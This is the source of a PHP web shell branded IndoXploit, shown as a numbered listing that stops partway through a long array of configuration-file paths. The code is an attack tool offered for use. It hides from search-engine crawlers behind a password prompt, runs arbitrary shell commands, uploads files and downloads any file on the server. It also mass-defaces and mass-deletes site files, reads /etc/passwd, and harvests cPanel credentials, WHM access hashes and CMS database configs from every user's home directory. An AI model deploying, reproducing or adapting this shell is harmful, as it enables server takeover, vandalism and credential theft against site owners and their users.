<?phpsession_start();error_reporting(0);set_time_limit(0);@set_magic_quo

1. <?php
2. session_start();
3. error_reporting(0);
4. set_time_limit(0);
5. @set_magic_quotes_runtime(0);
6. @clearstatcache();
7. @ini_set('error_log',NULL);
8. @ini_set('log_errors',0);
9. @ini_set('max_execution_time',0);
10. @ini_set('output_buffering',0);
11. @ini_set('display_errors', 0);
12.  
13. $auth_pass = "2f8bd7de7e4f23ed12d1c892751e8797"; // default: cokkie
14. $color = "#00ff00";
15. $default_action = 'FilesMan';
16. $default_use_ajax = true;
17. $default_charset = 'UTF-8';
18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
21. header('HTTP/1.0 404 Not Found');
22. exit;
23. }
24. }
25.  
26. function login_shell() {
27. ?>
28. <html>
29. <head>
30. <title>IndoXploit</title>
31. <style type="text/css">
32. body{
33. background: url(http://img03.deviantart.net/efc3/i/2010/112/4/5/tare_panda_by_pixel_sage.png) no-repeat center center fixed; #fff;
34. -webkit-background-size: cover;
35. -moz-background-size: cover;
36. -o-background-size: cover;
37. background-size: cover;
38. background-attachment:fixed;
39. }
40. input[type=password] {
41. width: 250px;
42. height: 25px;
43. color: white;
44. background: transparent;
45. border: 1px dotted transparent;
46. padding: 5px;
47. margin-left: 20px;
48. text-align: center;
49. }
50. </style>
51. </head>
52. <center>
53. <form method="post">
54. <input type="password" name="pass">
55. </form>
56. <?php
57. exit;
58. }
59. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
60. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
61. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
62. else
63. login_shell();
64. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
65. @ob_clean();
66. $file = $_GET['file'];
67. header('Content-Description: File Transfer');
68. header('Content-Type: application/octet-stream');
69. header('Content-Disposition: attachment; filename="'.basename($file).'"');
70. header('Expires: 0');
71. header('Cache-Control: must-revalidate');
72. header('Pragma: public');
73. header('Content-Length: ' . filesize($file));
74. readfile($file);
75. exit;
76. }
77. ?>
78. <html>
79. <head>
80. <title>IndoXploit</title>
81. <meta name='author' content='IndoXploit'>
82. <meta charset="UTF-8">
83. <link href="http://bootswatch.com/flatly/bootstrap.min.css" rel="stylesheet">
84. <script ></script>
85. <style type='text/css'>
86. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
87. body{
88. background: url(http://img03.deviantart.net/efc3/i/2010/112/4/5/tare_panda_by_pixel_sage.png) no-repeat center center fixed; #fff;
89. -webkit-background-size: cover;
90. -moz-background-size: cover;
91. -o-background-size: cover;
92. background-size: cover;
93. background-attachment:fixed;
94. color:white;
95. font-size:13px;
96. font-family: "Lato","Helvetica Neue",Helvetica,Arial,sans-serif;
97. }
98. h1{
99. color:#18BC9C;
100. }
101. li {
102. display: inline;
103. margin: 5px;
104. padding: 5px;
105. }
106. table, th, td {
107. border-collapse:collapse;
108. font-family: Tahoma, Geneva, sans-serif;
109. background: transparent;
110. font-family: 'Ubuntu';
111. font-size: 13px;
112. padding: 5px;
113. }
114. .table_home, .td_home {
115. border: 1px solid #18BC9C;
116. }
117. .td_home:hover {
118. background:grey;
119. }
120. .th_home{
121. padding: 5px;
122. border: 1px solid #18BC9C;
123. background:#18BC9C;
124. }
125. th {
126. padding: 15px;
127. }
128. a {
129. color: #ffffff;
130. }
131.  
132. input[type=text], input[type=password]{
133. background: transparent;
134. color: white;
135. border: 1px solid #18BC9C;
136. margin: 5px auto;
137. padding-left: 5px;
138. font-family: 'Ubuntu';
139. font-size: 13px;
140. }
141. input[type=submit]{
142. color: white;
143. border: 1px solid #18BC9C;
144. margin: 5px;
145. padding: 3px 15px;
146. font-family: 'Ubuntu';
147. font-size: 13px;
148. }
149. textarea {
150. border: 1px solid #18BC9C;
151. width: 100%;
152. height: 400px;
153. padding-left: 5px;
154. margin: 10px auto;
155. resize: none;
156. background: transparent;
157. color: #ffffff;
158. font-family: 'Ubuntu';
159. font-size: 13px;
160. }
161. select {
162. width: 152px;
163. background: #000000;
164. color: #18BC9C;
165. border: 1px solid #ffffff;
166. margin: 5px auto;
167. padding-left: 5px;
168. font-family: 'Ubuntu';
169. font-size: 13px;
170. }
171. option:hover {
172. background: #18BC9C;
173. color: #000000;
174. }
175. </style>
176. </head>
177. <?php
178. ###############################################################################
179. // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
180. // Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
181. // Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
182. // Tanpa kalian kita tidak akan BESAR seperti sekarang.
183. // Greetz: All Member IndoXploit. & all my friends.
184. ###############################################################################
185. function w($dir,$perm) {
186. if(!is_writable($dir)) {
187. return "<font color=red>".$perm."</font>";
188. } else {
189. return "<font color=#18BC9C>".$perm."</font>";
190. }
191. }
192. function r($dir,$perm) {
193. if(!is_readable($dir)) {
194. return "<font color=red>".$perm."</font>";
195. } else {
196. return "<font color=#18BC9C>".$perm."</font>";
197. }
198. }
199. function exe($cmd) {
200. if(function_exists('system')) {
201. @ob_start();
202. @system($cmd);
203. $buff = @ob_get_contents();
204. @ob_end_clean();
205. return $buff;
206. } elseif(function_exists('exec')) {
207. @exec($cmd,$results);
208. $buff = "";
209. foreach($results as $result) {
210. $buff .= $result;
211. } return $buff;
212. } elseif(function_exists('passthru')) {
213. @ob_start();
214. @passthru($cmd);
215. $buff = @ob_get_contents();
216. @ob_end_clean();
217. return $buff;
218. } elseif(function_exists('shell_exec')) {
219. $buff = @shell_exec($cmd);
220. return $buff;
221. }
222. }
223. function perms($file){
224. $perms = fileperms($file);
225. if (($perms & 0xC000) == 0xC000) {
226. // Socket
227. $info = 's';
228. } elseif (($perms & 0xA000) == 0xA000) {
229. // Symbolic Link
230. $info = 'l';
231. } elseif (($perms & 0x8000) == 0x8000) {
232. // Regular
233. $info = '-';
234. } elseif (($perms & 0x6000) == 0x6000) {
235. // Block special
236. $info = 'b';
237. } elseif (($perms & 0x4000) == 0x4000) {
238. // Directory
239. $info = 'd';
240. } elseif (($perms & 0x2000) == 0x2000) {
241. // Character special
242. $info = 'c';
243. } elseif (($perms & 0x1000) == 0x1000) {
244. // FIFO pipe
245. $info = 'p';
246. } else {
247. // Unknown
248. $info = 'u';
249. }
250. // Owner
251. $info .= (($perms & 0x0100) ? 'r' : '-');
252. $info .= (($perms & 0x0080) ? 'w' : '-');
253. $info .= (($perms & 0x0040) ?
254. (($perms & 0x0800) ? 's' : 'x' ) :
255. (($perms & 0x0800) ? 'S' : '-'));
256. // Group
257. $info .= (($perms & 0x0020) ? 'r' : '-');
258. $info .= (($perms & 0x0010) ? 'w' : '-');
259. $info .= (($perms & 0x0008) ?
260. (($perms & 0x0400) ? 's' : 'x' ) :
261. (($perms & 0x0400) ? 'S' : '-'));
262. // World
263. $info .= (($perms & 0x0004) ? 'r' : '-');
264. $info .= (($perms & 0x0002) ? 'w' : '-');
265. $info .= (($perms & 0x0001) ?
266. (($perms & 0x0200) ? 't' : 'x' ) :
267. (($perms & 0x0200) ? 'T' : '-'));
268. return $info;
269. }
270. function hdd($s) {
271. if($s >= 1073741824)
272. return sprintf('%1.2f',$s / 1073741824 ).' GB';
273. elseif($s >= 1048576)
274. return sprintf('%1.2f',$s / 1048576 ) .' MB';
275. elseif($s >= 1024)
276. return sprintf('%1.2f',$s / 1024 ) .' KB';
277. else
278. return $s .' B';
279. }
280. function ambilKata($param, $kata1, $kata2){
281. if(strpos($param, $kata1) === FALSE) return FALSE;
282. if(strpos($param, $kata2) === FALSE) return FALSE;
283. $start = strpos($param, $kata1) + strlen($kata1);
284. $end = strpos($param, $kata2, $start);
285. $return = substr($param, $start, $end - $start);
286. return $return;
287. }
288. function getsource($url) {
289. $curl = curl_init($url);
290. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
291. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
292. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
293. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
294. $content = curl_exec($curl);
295. curl_close($curl);
296. return $content;
297. }
298. function bing($dork) {
299. $npage = 1;
300. $npages = 30000;
301. $allLinks = array();
302. $lll = array();
303. while($npage <= $npages) {
304. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
305. if($x) {
306. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
307. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
308. $npage = $npage + 10;
309. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
310. } else break;
311. }
312. $URLs = array();
313. foreach($allLinks as $url){
314. $exp = explode("/", $url);
315. $URLs[] = $exp[2];
316. }
317. $array = array_filter($URLs);
318. $array = array_unique($array);
319. $sss = count(array_unique($array));
320. foreach($array as $domain) {
321. echo $domain."\n";
322. }
323. }
324. function reverse($url) {
325. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
326. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
327. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
328. curl_setopt($ch, CURLOPT_HEADER, 0);
329. curl_setopt($ch, CURLOPT_POST, 1);
330. $resp = curl_exec($ch);
331. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
332. $array = explode(",,", $resp);
333. unset($array[0]);
334. foreach($array as $lnk) {
335. $lnk = "http://$lnk";
336. $lnk = str_replace(",", "", $lnk);
337. echo $lnk."\n";
338. ob_flush();
339. flush();
340. }
341. curl_close($ch);
342. }
343. if(get_magic_quotes_gpc()) {
344. function idx_ss($array) {
345. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
346. }
347. $_POST = idx_ss($_POST);
348. $_COOKIE = idx_ss($_COOKIE);
349. }
350.  
351. if(isset($_GET['dir'])) {
352. $dir = $_GET['dir'];
353. chdir($dir);
354. } else {
355. $dir = getcwd();
356. }
357. $kernel = php_uname();
358. $ip = gethostbyname($_SERVER['HTTP_HOST']);
359. $dir = str_replace("\\","/",$dir);
360. $scdir = explode("/", $dir);
361. $freespace = hdd(disk_free_space("/"));
362. $total = hdd(disk_total_space("/"));
363. $used = $total - $freespace;
364. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=#18BC9C>OFF</font>";
365. $ds = @ini_get("disable_functions");
366. $mysql = (function_exists('mysql_connect')) ? "<font color=#18BC9C>ON</font>" : "<font color=red>OFF</font>";
367. $curl = (function_exists('curl_version')) ? "<font color=#18BC9C>ON</font>" : "<font color=red>OFF</font>";
368. $wget = (exe('wget --help')) ? "<font color=#18BC9C>ON</font>" : "<font color=red>OFF</font>";
369. $perl = (exe('perl --help')) ? "<font color=#18BC9C>ON</font>" : "<font color=red>OFF</font>";
370. $python = (exe('python --help')) ? "<font color=#18BC9C>ON</font>" : "<font color=red>OFF</font>";
371. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=#18BC9C>NONE</font>";
372. if(!function_exists('posix_getegid')) {
373. $user = @get_current_user();
374. $uid = @getmyuid();
375. $gid = @getmygid();
376. $group = "?";
377. } else {
378. $uid = @posix_getpwuid(posix_geteuid());
379. $gid = @posix_getgrgid(posix_getegid());
380. $user = $uid['name'];
381. $uid = $uid['uid'];
382. $group = $gid['name'];
383. $gid = $gid['gid'];
384. }
385. echo "System: <font color=#18BC9C>".$kernel."</font><br>";
386. echo "User: <font color=#18BC9C>".$user."</font> (".$uid.") Group: <font color=#18BC9C>".$group."</font> (".$gid.")<br>";
387. echo "Server IP: <font color=#18BC9C>".$ip."</font> | Your IP: <font color=#18BC9C>".$_SERVER['REMOTE_ADDR']."</font><br>";
388. echo "HDD: <font color=#18BC9C>$used</font> / <font color=#18BC9C>$total</font> ( Free: <font color=#18BC9C>$freespace</font> )<br>";
389. echo "Safe Mode: $sm<br>";
390. echo "Disable Functions: $show_ds<br>";
391. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
392.  
393. echo "<hr>";
394. echo "<center>";
395. echo "<ul>";
396. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?'>Home</a></li>";
397. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=upload'>Upload</a> </li>";
398. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='#com'>Command</a> </li>";
399. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=mass_deface'>Mass Deface</a></li>";
400. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=mass_delete'>Mass Delete</a></li>";
401. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=config'>Config Grabber</a></li>";
402. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=jumping'>Jumping</a></li>";
403. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=cpanel'>CPanel Crack</a></li>";
404. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=smtp'>SMTP Grabber</a></li>";
405. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=zoneh'>Zone-H</a></li>";
406. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=cgi'>CGI Telnet</a></li>";
407. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=network'>network</a></li>";
408. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=adminer'>Adminer</a></li><br>";
409. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=fake_root'>Fake Root</a></li>";
410. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a></li>";
411. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a></li>";
412. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a></li>";
413. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a></li>";
414. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a></li>";
415. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a></li>";
416. echo "<a style=margin:3px; class='btn btn-success btn-sm' style='color: red;' href='?logout=true'>Logout</a></li>";
417. echo "</ul>";
418. echo "</center>";
419. echo "<hr>";
420. echo "Current DIR: ";
421. foreach($scdir as $c_dir => $cdir) {
422. echo "<a href='?dir=";
423. for($i = 0; $i <= $c_dir; $i++) {
424. echo "$scdir[$i]";
425. if($i != $c_dir) {
426. echo "/";
427. }
428. }
429. echo "'>$cdir</a>/";
430. }
431. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ] <br>";
432. if($_GET['logout'] == true) {
433. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
434. echo "<script>window.location='?';</script>";
435. } elseif($_GET['do'] == 'upload') {
436. echo "<center>";
437. if($_POST['upload']) {
438. if($_POST['tipe_upload'] == 'biasa') {
439. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
440. $act = "<font color=#18BC9C>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
441. } else {
442. $act = "<font color=red>failed to upload file</font>";
443. }
444. } else {
445. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
446. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
447. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
448. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
449. $act = "<font color=#18BC9C>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
450. } else {
451. $act = "<font color=red>failed to upload file</font>";
452. }
453. } else {
454. $act = "<font color=red>failed to upload file</font>";
455. }
456. }
457. }
458. echo "<h1> Upload File </h1>:
459. <form method='post' enctype='multipart/form-data'>
460. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")."
461. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")."<br>
462. <input type='file' name='ix_file'>
463. <input type='submit' value='upload' name='upload' class='btn btn-success btn-sm'>
464. </form>";
465. echo $act;
466. echo "</center>";
467.  
468. } elseif($_GET['do'] == 'mass_deface') {
469. function sabun_massal($dir,$namafile,$isi_script) {
470. if(is_writable($dir)) {
471. $dira = scandir($dir);
472. foreach($dira as $dirb) {
473. $dirc = "$dir/$dirb";
474. $lokasi = $dirc.'/'.$namafile;
475. if($dirb === '.') {
476. file_put_contents($lokasi, $isi_script);
477. } elseif($dirb === '..') {
478. file_put_contents($lokasi, $isi_script);
479. } else {
480. if(is_dir($dirc)) {
481. if(is_writable($dirc)) {
482. echo "[<font color=#18BC9C>DONE</font>] $lokasi<br>";
483. file_put_contents($lokasi, $isi_script);
484. $idx = sabun_massal($dirc,$namafile,$isi_script);
485. }
486. }
487. }
488. }
489. }
490. }
491. function sabun_biasa($dir,$namafile,$isi_script) {
492. if(is_writable($dir)) {
493. $dira = scandir($dir);
494. foreach($dira as $dirb) {
495. $dirc = "$dir/$dirb";
496. $lokasi = $dirc.'/'.$namafile;
497. if($dirb === '.') {
498. file_put_contents($lokasi, $isi_script);
499. } elseif($dirb === '..') {
500. file_put_contents($lokasi, $isi_script);
501. } else {
502. if(is_dir($dirc)) {
503. if(is_writable($dirc)) {
504. echo "[<font color=#18BC9C>DONE</font>] $dirb/$namafile<br>";
505. file_put_contents($lokasi, $isi_script);
506. }
507. }
508. }
509. }
510. }
511. }
512. if($_POST['start']) {
513. if($_POST['tipe_sabun'] == 'mahal') {
514. echo "<div style='margin: 5px auto; padding: 5px'>";
515. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
516. echo "</div>";
517. } elseif($_POST['tipe_sabun'] == 'murah') {
518. echo "<div style='margin: 5px auto; padding: 5px'>";
519. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
520. echo "</div>";
521. }
522. } else {
523. echo "<center>";
524. echo "<form method='post'>
525. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
526. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
527. <font style='text-decoration: underline;'>Folder:</font><br>
528. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
529. <font style='text-decoration: underline;'>Filename:</font><br>
530. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
531. <font style='text-decoration: underline;'>Index File:</font><br>
532. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by IndoXploit</textarea><br>
533. <input type='submit' name='start' value='Mass Deface' style='width: 450px;' class='btn btn-success btn-sm'>
534. </form></center>";
535. }
536. } elseif($_GET['do'] == 'mass_delete') {
537. function hapus_massal($dir,$namafile) {
538. if(is_writable($dir)) {
539. $dira = scandir($dir);
540. foreach($dira as $dirb) {
541. $dirc = "$dir/$dirb";
542. $lokasi = $dirc.'/'.$namafile;
543. if($dirb === '.') {
544. if(file_exists("$dir/$namafile")) {
545. unlink("$dir/$namafile");
546. }
547. } elseif($dirb === '..') {
548. if(file_exists("".dirname($dir)."/$namafile")) {
549. unlink("".dirname($dir)."/$namafile");
550. }
551. } else {
552. if(is_dir($dirc)) {
553. if(is_writable($dirc)) {
554. if(file_exists($lokasi)) {
555. echo "[<font color=#18BC9C>DELETED</font>] $lokasi<br>";
556. unlink($lokasi);
557. $idx = hapus_massal($dirc,$namafile);
558. }
559. }
560. }
561. }
562. }
563. }
564. }
565. if($_POST['start']) {
566. echo "<div style='margin: 5px auto; padding: 5px'>";
567. hapus_massal($_POST['d_dir'], $_POST['d_file']);
568. echo "</div>";
569. } else {
570. echo "<center>";
571. echo "<form method='post'>
572. <font style='text-decoration: underline;'>Folder:</font><br>
573. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
574. <font style='text-decoration: underline;'>Filename:</font><br>
575. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
576. <input type='submit' name='start' value='Mass Delete' style='width: 450px;' class='btn btn-success btn-sm'>
577. </form></center>";
578. }
579. } elseif($_GET['do'] == 'config') {
580. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
581. $idx = mkdir("idx_config", 0777);
582. $isi_htc = "Options all\nRequire None\nSatisfy Any";
583. $htc = fopen("idx_config/.htaccess","w");
584. fwrite($htc, $isi_htc);
585. while($passwd = fgets($etc)) {
586. if($passwd == "" || !$etc) {
587. echo "<font color=red>Can't read /etc/passwd</font>";
588. } else {
589. preg_match_all('/(.*?):x:/', $passwd, $user_config);
590. foreach($user_config[1] as $user_idx) {
591. $user_config_dir = "/home/$user_idx/public_html/";
592. if(is_readable($user_config_dir)) {
593. $grab_config = array(
594. "/home/$user_idx/.my.cnf" => "cpanel",
595. "/home/$user_idx/.accesshash" => "WHM-accesshash",
596. "/home/$user_idx/public_html/po-content/config.php" => "Popoji",
597. "/home/$user_idx/public_html/public_html/admin/config.php" => "-shop-os",
598. "/home/$user_idx/public_html/public_html/libs/dbconnect.php" => "-TemplateLite",
599. "/home/$user_idx/public_html/public_html/includes/configure.php" => "-shop",
600. "/home/$user_idx/public_html/public_html/os/includes/configure.php" => "-shop-os",
601. "/home/$user_idx/public_html/public_html/oscom/includes/configure.php" => "-oscom",
602. "/home/$user_idx/public_html/public_html/oscommerce/includes/configure.php" => "-oscommerce",
603. "/home/$user_idx/public_html/public_html/oscommerces/includes/configure.php" => "-oscommerces",
604. "/home/$user_idx/public_html/public_html/shop/includes/configure.php" => "-shop2",
605. "/home/$user_idx/public_html/public_html/shopping/includes/configure.php" => "-shop-shopping",
606. "/home/$user_idx/public_html/public_html/sale/includes/configure.php" => "-sale",
607. "/home/$user_idx/public_html/public_html/amember/config.TXT.php" => "-amember",
608. "/home/$user_idx/public_html/public_html/config.TXT.php" => "-amember2",
609. "/home/$user_idx/public_html/public_html/members/configuration.php" => "-members",
610. "/home/$user_idx/public_html/public_html/config.php" => "-4images1",
611. "/home/$user_idx/public_html/public_html/forum/includes/config.php" => "-forum",
612. "/home/$user_idx/public_html/public_html/forums/includes/config.php" => "-forums",
613. "/home/$user_idx/public_html/public_html/admin/conf.php" => "-5",
614. "/home/$user_idx/public_html/public_html/admin/config.php" => "-4",
615. "/home/$user_idx/public_html/public_html/wp-config.php" => "-wp13",
616. "/home/$user_idx/public_html/public_html/wp/wp-config.php" => "-wp13-wp",
617. "/home/$user_idx/public_html/public_html/WP/wp-config.php" => "-wp13-WP",
618. "/home/$user_idx/public_html/public_html/wp/beta/wp-config.php" => "-wp13-wp-beta",
619. "/home/$user_idx/public_html/public_html/beta/wp-config.php" => "-wp13-beta",
620. "/home/$user_idx/public_html/public_html/press/wp-config.php" => "-wp13-press",
621. "/home/$user_idx/public_html/public_html/wordpress/wp-config.php" => "-wp13-wordpress",
622. "/home/$user_idx/public_html/public_html/Wordpress/wp-config.php" => "-wp13-Wordpress",
623. "/home/$user_idx/public_html/public_html/blog/wp-config.php" => "-wp13-Wordpress",
624. "/home/$user_idx/public_html/public_html/wordpress/beta/wp-config.php" => "-wp13-wordpress-beta",
625. "/home/$user_idx/public_html/public_html/news/wp-config.php" => "-wp13-news",
626. "/home/$user_idx/public_html/public_html/new/wp-config.php" => "-wp13-new",
627. "/home/$user_idx/public_html/public_html/blog/wp-config.php" => "-wp-blog",
628. "/home/$user_idx/public_html/public_html/beta/wp-config.php" => "-wp-beta",
629. "/home/$user_idx/public_html/public_html/blogs/wp-config.php" => "-wp-blogs",
630. "/home/$user_idx/public_html/public_html/home/wp-config.php" => "-wp-home",
631. "/home/$user_idx/public_html/public_html/protal/wp-config.php" => "-wp-protal",
632. "/home/$user_idx/public_html/public_html/site/wp-config.php" => "-wp-site",
633. "/home/$user_idx/public_html/public_html/main/wp-config.php" => "-wp-main",
634. "/home/$user_idx/public_html/public_html/test/wp-config.php" => "-wp-test",
635. "/home/$user_idx/public_html/public_html/arcade/functions/dbclass.php" => "-ibproarcade",
636. "/home/$user_idx/public_html/public_html/joomla/configuration.php" => "-joomla2",
637. "/home/$user_idx/public_html/public_html/protal/configuration.php" => "-joomla-protal",
638. "/home/$user_idx/public_html/public_html/joo/configuration.php" => "-joo",
639. "/home/$user_idx/public_html/public_html/cms/configuration.php" => "-joomla-cms",
640. "/home/$user_idx/public_html/public_html/site/configuration.php" => "-joomla-site",
641. "/home/$user_idx/public_html/public_html/main/configuration.php" => "-joomla-main",
642. "/home/$user_idx/public_html/public_html/news/configuration.php" => "-joomla-news",
643. "/home/$user_idx/public_html/public_html/new/configuration.php" => "-joomla-new",
644. "/home/$user_idx/public_html/public_html/home/configuration.php" => "-joomla-home",
645. "/home/$user_idx/public_html/public_html/vb/includes/config.php" => "-vb-config",
646. "/home/$user_idx/public_html/public_html/vb3/includes/config.php" => "-vb3-config",
647. "/home/$user_idx/public_html/public_html/cc/includes/config.php" => "-vb1-config",
648. "/home/$user_idx/public_html/public_html/includes/config.php" => "-includes-vb",
649. "/home/$user_idx/public_html/public_html/configuration.php" => "-joomla",
650. "/home/$user_idx/public_html/public_html/includes/dist-configure.php" => "-zencart",
651. "/home/$user_idx/public_html/public_html/zencart/includes/dist-configure.php" => "-shop-zencart",
652. "/home/$user_idx/public_html/public_html/shop/includes/dist-configure.php" => "-shop-ZCshop",
653. "/home/$user_idx/public_html/public_html/Settings.php" => "-smf",
654. "/home/$user_idx/public_html/public_html/smf/Settings.php" => "-smf2",
655. "/home/$user_idx/public_html/public_html/forum/Settings.php" => "-smf-forum",
656. "/home/$user_idx/public_html/public_html/forums/Settings.php" => "-smf-forums",
657. "/home/$user_idx/public_html/public_html/upload/includes/config.php" => "-up",
658. "/home/$user_idx/public_html/public_html/article/config.php" => "-Nwahy",
659. "/home/$user_idx/public_html/public_html/up/includes/config.php" => "-up2",
660. "/home/$user_idx/public_html/public_html/conf_global.php" => "-6",
661. "/home/$user_idx/public_html/public_html/include/db.php" => "-7",
662. "/home/$user_idx/public_html/public_html/connect.php" => "-PHP-Fusion",
663. "/home/$user_idx/public_html/public_html/mk_conf.php" => "-9",
664. "/home/$user_idx/public_html/public_html/includes/config.php" => "-traidnt1",
665. "/home/$user_idx/public_html/public_html/config.php" => "-4images",
666. "/home/$user_idx/public_html/public_html/sites/default/settings.php" => "-Drupal",
667. "/home/$user_idx/public_html/public_html/drupal/sites/default/settings.php" => "-Drupal",
668. "/home/$user_idx/public_html/public_html/sites/default/dbconfig.php" => "dbconfig",
669. "/home/$user_idx/public_html/public_html/member/configuration.php" => "-1member",
670. "/home/$user_idx/public_html/public_html/supports/includes/iso4217.php" => "-hostbills-supports",
671. "/home/$user_idx/public_html/public_html/client/includes/iso4217.php" => "-hostbills-client",
672. "/home/$user_idx/public_html/public_html/support/includes/iso4217.php" => "-hostbills-support",
673. "/home/$user_idx/public_html/public_html/billing/includes/iso4217.php" => "-hostbills-billing",
674. "/home/$user_idx/public_html/public_html/billings/includes/iso4217.php" => "-hostbills-billings",
675. "/home/$user_idx/public_html/public_html/host/includes/iso4217.php" => "-hostbills-host",
676. "/home/$user_idx/public_html/public_html/hosts/includes/iso4217.php" => "-hostbills-hosts",
677. "/home/$user_idx/public_html/public_html/hosting/includes/iso4217.php" => "-hostbills-hosting",
678. "/home/$user_idx/public_html/public_html/hostings/includes/iso4217.php" => "-hostbills-hostings",
679. "/home/$user_idx/public_html/public_html/includes/iso4217.php" => "-hostbills",
680. "/home/$user_idx/public_html/public_html/hostbills/includes/iso4217.php" => "-hostbills-hostbills",
681. "/home/$user_idx/public_html/public_html/hostbill/includes/iso4217.php" => "-hostbills-hostbill",
682. "/home/$user_idx/public_html/public_html/cart/configuration.php" => "-cart-WHMCS",
683. "/home/$user_idx/public_html/public_html/hosting/configuration.php" => "-hosting-WHMCS",
684. "/home/$user_idx/public_html/public_html/buy/configuration.php" => "-buy-WHMCS",
685. "/home/$user_idx/public_html/public_html/checkout/configuration.php" => "-checkout-WHMCS",
686. "/home/$user_idx/public_html/public_html/host/configuration.php" => "-host-WHMCS",
687. "/home/$user_idx/public_html/public_html/shop/configuration.php" => "-shop-WHMCS",
688. "/home/$user_idx/public_html/public_html/shopping/configuration.php" => "-shopping-WHMCS",
689. "/home/$user_idx/public_html/public_html/sale/configuration.php" => "-sale-WHMCS",
690. "/home/$user_idx/public_html/public_html/client/configuration.php" => "-client-WHMCS",
691. "/home/$user_idx/public_html/public_html/support/configuration.php" => "-support-WHMCS",
692. "/home/$user_idx/public_html/public_html/clientsupport/configuration.php" => "-clientsupport-WHMCS",
693. "/home/$user_idx/public_html/public_html/whm/whmcs/configuration.php" => "-whm-whmcs",
